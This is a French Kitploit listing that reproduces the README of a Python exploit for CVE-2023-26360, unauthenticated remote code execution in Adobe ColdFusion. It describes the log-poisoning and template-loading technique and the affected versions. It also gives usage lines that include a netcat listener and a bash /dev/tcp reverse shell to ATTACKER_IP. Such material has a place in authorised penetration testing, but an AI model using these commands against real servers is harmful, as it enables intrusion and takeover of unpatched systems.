Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Adobe_ColdFusion_RCE_Unauthenticated — Cet exploit est basé sur CVE-2023-26360 (https://nvd.nist.gov/vuln/detail/CVE-2023-26360) et a été construit à partir du module Metasploit et de jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit. | Kitploit
Outils/GitHubGitHub/joaoaugustom/adobe_coldfusion_rce_unauthenticated
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubjoaoaugustom/adobe_coldfusion_rce_unauthenticated

Adobe_ColdFusion_RCE_Unauthenticated

Cet exploit est basé sur CVE-2023-26360 (https://nvd.nist.gov/vuln/detail/CVE-2023-26360) et a été construit à partir du module Metasploit et de jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 2 moisPas encore vérifié

CVE-2023-26360 — Adobe ColdFusion RCE non authentifié

Implémentation en Python de l'exploit d'exécution de code à distance pour CVE-2023-26360, basée sur l'analyse du module Metasploit original et des travaux antérieurs de jakabakos.

Pourquoi ce projet existe

Le PoC de jakabakos tente d'injecter <cfexecute> directement dans le paramètre _variables et de lire la sortie depuis le journal ColdFusion en une seule étape. Cette approche échoue car ColdFusion n'évalue pas les balises CFML en ligne dans ce contexte, ce qui produit une erreur 500 sans exécution de code.

Cette implémentation reproduit le mécanisme correct en deux étapes utilisé par le module Metasploit :

  1. Empoisonnement du journal — envoie une charge utile _variables malformée ({<cftry>CFML</cftry>) au point de terminaison CFC vulnérable. ColdFusion ne parvient pas à l'analyser et écrit le contenu brut — y compris le code CFML — dans coldfusion-out.log.
  2. Exécution du template — utilise la vulnérabilité de désérialisation du classname pour charger le fichier journal empoisonné comme template ColdFusion, ce qui amène le serveur à exécuter le CFML injecté.

L'exécution de commandes est réalisée via java.lang.Runtime.exec() par l'intermédiaire de createObject, évitant ainsi toute dépendance à <cfexecute>, qui est généralement désactivé dans les environnements durcis ou de production.

Versions concernées

  • Adobe ColdFusion 2021 Update 5 et antérieures
  • Adobe ColdFusion 2018 Update 15 et antérieures

Prérequis

root@kitploit:~
pip install -r requirements.txt

Utilisation

Démarrez un listener avant de lancer l'exploit :

root@kitploit:~
nc -lvnp 4444

Cible Windows :

root@kitploit:~
python exploit.py --host http://TARGET:8500 --win --cmd "powershell -e <BASE64_PAYLOAD>"

Cible Linux :

root@kitploit:~
python exploit.py --host http://TARGET:8500 --cmd "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Via un proxy (par ex. Burp Suite) :

root@kitploit:~
python exploit.py --host http://TARGET:8500 --win --cmd "whoami" --proxy http://127.0.0.1:8080

Options

FlagDescription

Comment cela fonctionne

root@kitploit:~
┌─────────────┐         Étape 1 : planter le CFML        ┌──────────────────┐
│  Attaquant  │ ──── POST /_variables={<cftry>...  ──► iedit.cfc        │
│             │      CF ne parvient pas à analyser,       │                  │
│             │      journalise le CFML                   │ coldfusion-      │
│             │         Étape 2 : déclencher l'exécution  │ out.log          │
│             │ ──── POST classname=X..\logs\cf... ──► (chargé comme    │
│             │                                       │  template CFML)   │
│  Listener   │ ◄─────────────── reverse shell ───────│                  │
└─────────────┘                                       └──────────────────┘

Références

  • Bulletin de sécurité Adobe
  • Analyse Rapid7 — AttackerKB
  • Module Metasploit
  • PoC jakabakos

Avertissement

Cet outil est fourni à des fins pédagogiques et pour des évaluations de sécurité autorisées uniquement (tests d'intrusion, CTF, environnements de laboratoire). Exécuter cet exploit contre des systèmes sans autorisation écrite explicite est illégal. L'auteur décline toute responsabilité en cas d'utilisation abusive.

Télécharger l’outil
--host
URL de base de la cible (par ex. http://192.168.1.10:8500)
--cmdCommande à exécuter sur la cible
--winDéfinir ce flag si la cible est un hôte Windows
--proxyURL de proxy HTTP optionnelle